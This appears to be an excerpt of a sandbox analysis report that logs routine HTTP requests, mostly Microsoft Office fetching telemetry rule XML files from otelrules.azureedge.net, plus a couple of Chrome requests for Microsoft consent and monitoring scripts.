Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
